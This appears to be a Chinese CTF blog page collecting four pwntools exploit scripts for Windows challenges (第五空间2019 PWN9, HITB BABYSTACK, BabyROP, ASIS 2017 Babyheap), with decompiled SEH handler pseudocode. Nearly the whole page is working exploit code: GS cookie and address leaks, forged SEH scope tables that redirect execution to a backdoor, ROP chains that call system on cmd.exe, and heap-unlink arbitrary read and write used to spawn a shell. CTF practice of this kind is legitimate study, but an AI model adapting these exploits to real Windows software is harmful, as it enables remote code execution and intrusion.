[Windows][第五空间2019 决赛]PWN9
exp:
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
# context.log_level = 'debug'
context.arch = 'i386'
p = remote('192.168.0.100', 2222)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def get_value(address):
p.recvuntil('Do you want to know more?')
p.sendline('yes')
p.recvuntil('Where do you want to know')
p.sendline(str(address))
p.recvuntil('value is ')
value = int(p.recvuntil('\n', drop=True), 16)
return value
"""
void __cdecl ValidateLocalCookies(void (__fastcall *cookieCheckFunction)(unsigned int), _EH4_SCOPETABLE *scopeTable, char *framePointer)
{
unsigned int v3; // esi@2
unsigned int v4; // esi@3
if ( scopeTable->GSCookieOffset != -2 )
{
v3 = *(_DWORD *)&framePointer[scopeTable->GSCookieOffset] ^ (unsigned int)&framePointer[scopeTable->GSCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v3);
}
v4 = *(_DWORD *)&framePointer[scopeTable->EHCookieOffset] ^ (unsigned int)&framePointer[scopeTable->EHCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v4);
}
int __cdecl _except_handler4_common(unsigned int *securityCookies, void (__fastcall *cookieCheckFunction)(unsigned int), _EXCEPTION_RECORD *exceptionRecord, unsigned __int32 sehFrame, _CONTEXT *context)
{
// 异或解密 scope table
scopeTable_1 = (_EH4_SCOPETABLE *)(*securityCookies ^ *(_DWORD *)(sehFrame + 8));
// sehFrame 等于 上图 ebp - 10h 位置, framePointer 等于上图 ebp 的位置
framePointer = (char *)(sehFrame + 16);
scopeTable = scopeTable_1;
// 验证 GS
ValidateLocalCookies(cookieCheckFunction, scopeTable_1, (char *)(sehFrame + 16));
__except_validate_context_record(context);
if ( exceptionRecord->ExceptionFlags & 0x66 )
{
......
}
else
{
exceptionPointers.ExceptionRecord = exceptionRecord;
exceptionPointers.ContextRecord = context;
tryLevel = *(_DWORD *)(sehFrame + 12);
*(_DWORD *)(sehFrame - 4) = &exceptionPointers;
if ( tryLevel != -2 )
{
while ( 1 )
{
v8 = tryLevel + 2 * (tryLevel + 2);
filterFunc = (int (__fastcall *)(_DWORD, _DWORD))*(&scopeTable_1->GSCookieXOROffset + v8);
scopeTableRecord = (_EH4_SCOPETABLE_RECORD *)((char *)scopeTable_1 + 4 * v8);
encloseingLevel = scopeTableRecord->EnclosingLevel;
scopeTableRecord_1 = scopeTableRecord;
if ( filterFunc )
{
// 调用 FilterFunc
filterFuncRet = _EH4_CallFilterFunc(filterFunc);
......
if ( filterFuncRet > 0 )
{
......
// 调用 HandlerFunc
_EH4_TransferToHandler(scopeTableRecord_1->HandlerFunc, v5 + 16);
......
}
}
......
tryLevel = encloseingLevel;
if ( encloseingLevel == -2 )
break;
scopeTable_1 = scopeTable;
}
......
}
}
......
}
"""
ru("= 0x")
stack = int(p.recvuntil("\n")[:-1],16)
lg("stack",stack)
ru("= 0x")
main_addr = int(p.recvuntil("\n")[:-1],16)
lg("main_addr",main_addr)
security_cookie = get_value(main_addr+0x404004-0x4010b0)
# lg("security_cookie_addr",main_addr+0x404004-0x4010b0)
lg("security_cookie",security_cookie)
scopetable = stack+0x94
lg("scopetable",scopetable)
excepthandler = stack+0x90
next_ptr = get_value(stack+0x90-0x4)
lg("next_ptr",next_ptr)
ExceptionHandler = main_addr+0x1460-0x10b0
lg("ExceptionHandler",ExceptionHandler)
backdoor = main_addr-0x10b0+0x138D
fake_scope = [
0x0FFFFFFEc, # GSCookieOffset -0x14
0, # GSCookieXOROffset
0x0FFFFFF20, # EHCookieOffset #-224
0, # EHCookieXOROffset
0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
backdoor # ScopeRecord.FilterFunc
]
ebp = stack+0x9c
fake_scope_addr = stack+0x10
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^security_cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^security_cookie) #scopetable
payload += p32(0) #try_level
p.recvuntil('Do you want to know more?')
p.sendline('nooo')
p.sendline(payload)
p.recvuntil('Do you want to know more?')
p.sendline('yes')
p.recvuntil('Where do you want to know')
p.sendline('0')
p.interactive()
[Windows][HITB GSEC]BABYSTACK
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
p = remote('node3.buuoj.cn',27300)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
ru("0x")
stack = int(p.recvuntil('\r')[:-1],16)
lg("stack",stack)
ru("0x")
main = int(ru("\r")[:-1],16)
lg("main",main)
def getaddr(addr):
sla("OtherwhereWillBeTheAnswer\r\n","yes")
sla("Where do you want to know\r\n",str(addr))
ru("is 0x")
return int(ru('\r')[:-1],16)
cookie = getaddr(main-0x1610b0+0x164004)
lg("cookie",cookie)
ebp = stack+0x9c
try_level = ebp-0x4
ExceptionHandler = getaddr(ebp-0xc)
lg("ExceptionHandler",ExceptionHandler)
next_ptr = getaddr(ebp-0x10)
lg("next_ptr",next_ptr)
backdoor = main+0x16138D-0x1610B0
lg("backdoor_addr",backdoor)
fake_scope = [
0x0FFFFFFEc, # GSCookieOffset -0x14
0, # GSCookieXOROffset
0x0FFFFFF20, # EHCookieOffset #-224
0, # EHCookieXOROffset
0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
backdoor # ScopeRecord.FilterFunc
]
fake_scope_addr = stack+0x10
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^cookie) #scopetable
payload += p32(0) #try_level
sla("OtherwhereWillBeTheAnswer\r\n","no")
sl(payload)
# getaddr(0)
p.interactive()
[Windows][Others]BabyROP
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
p = remote('node3.buuoj.cn',26336)
# p = remote("192.168.0.104",7777)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
p.recvuntil("name")
p.sendline("A"*24)
p.recvuntil("A"*24)
crt = p.recv(4)
msvcr_base = u32(crt) - 0x16e2d
lg("msvcr_base",msvcr_base)
system_address = msvcr_base + 0x62632
cmd_address = msvcr_base + 0x43030
payload = "A"*0xCC+"AAAA"+p32(system_address)+p32(0xdeadbeaf)+p32(cmd_address)
p.recvuntil("input your message length")
p.sendline(str(len(payload)))
p.sendline(payload)
p.interactive()
#78ABD04D
#78B02632 system
[Windows][ASIS 2017]Babyheap
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
# context.log_level = 'debug'
context.arch = 'i386'
# p = remote('node3.buuoj.cn',29886)
p = remote("192.168.0.104",2222)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
ru("0x")
codebase = int(ru("\r")[:-1],16)-0x1090
lg("codebase",codebase)
def cmd(idx):
sla("choice?\r\n",str(idx))
def add(size,payload):
cmd(1)
sla("sword?\r\n",str(size))
sla("it!\r\n",payload)
def edit(index, size, content):
p.sendlineafter('choice?\r\n', '3')
p.sendlineafter('polish?\r\n', str(index))
p.sendlineafter('time?\r\n', str(size))
p.sendafter('again : \r\n', content)
def free(idx):
cmd(2)
sla('Which sword do you want to destroy?\r\n',str(idx))
def show(idx):
cmd(4)
sla('Which one will you check?\r\n',str(idx))
for i in range(6):
add(0x58, 'a'*0x20)
free(2)
edit(1,0x58,"a"*0x58+'\n')
show(1)
ru("a"*0x58)
header = u64(ru("\r")[:-1].ljust(8,"\x00"))
lg("header",header)
addr = codebase+0x4370
addr2 = codebase+0x43bc
# heaader = ru("S")[:-1]
# edit(1,0x58+0x8,"a"*0x58+p64(header)+'\n')
free(4)
edit(1, 0x58 + 8 + 8, 'b' * 0x58 + p64(header) + p32(addr + 4) + p32(addr + 8) + '\n')
free(1)
p.sendlineafter('choice?\r\n', '1337')
p.sendlineafter('target?\r\n', str(addr2+0x2))
payload = p32(addr2)+p32(addr)+p32(codebase+0x30c8)#4
payload += p32(0x300C+codebase)
edit(2,len(payload),payload+'\n')
edit(2,6,"\x01"*6+'\n')
show(4)
ru("how : ")
ucrtbase = u32(p.recv(4))-0xB89F0
lg("ucrtbase",ucrtbase)
sys_addr = 0xEFDA0+ucrtbase
cmd_addr = 0x15084+ucrtbase
show(5)
ru("how : ")
ntdll_base = u32(p.recv(4))-0x44160
lg("ntdll_base",ntdll_base)
ntdll_PedLdr_addr = ntdll_base+0x120c40
addr3 = ntdll_PedLdr_addr-0x34
edit(3,8,p32(addr)+p32(addr3)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,"\x00"))-0x21c+0x3000
# lg("stack_addr",stack_addr)
edit(0,8,p32(addr)+p32(stack_addr)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,'\x00'))
lg("stack_addr",stack_addr)
ret_addr = stack_addr & 0xffff00
ret_addr = ret_addr+0x5c
lg("ret_addr",ret_addr)
ret_addr_content = 0x193B+codebase
for i in range(60,100):
edit(0,8,p32(addr)+p32(ret_addr+i*4)+'\n')
show(1)
ru("how : ")
ss = u32(p.recv(3).ljust(4,'\x00'))
print i
# print "["+str(hex(ret_addr+i*4)) + "] :" + str(hex(ss))
if ss == ret_addr_content:
log.success("Success Found!")
ret_addr = ret_addr+i*4
break
lg("ret_addr",ret_addr)
s1 = p32(addr)+p32(ret_addr)+"cmd.exe\x00"
edit(0,len(s1),s1+'\n')
# show(1)
# ru("how : ")
# ss = u32(p.recv(3).ljust(4,'\x00'))
# lg("ss",ss)
# if(p.recv(4))
# edit(0,8,p32(addr)+p32(ret_addr)+'\n')
payload = [
sys_addr,
codebase+0x21AF,
addr+0x4+0x4,
0,
]
edit(1,16,flat(payload)+'\n')
cmd(5)
p.interactive()
网友评论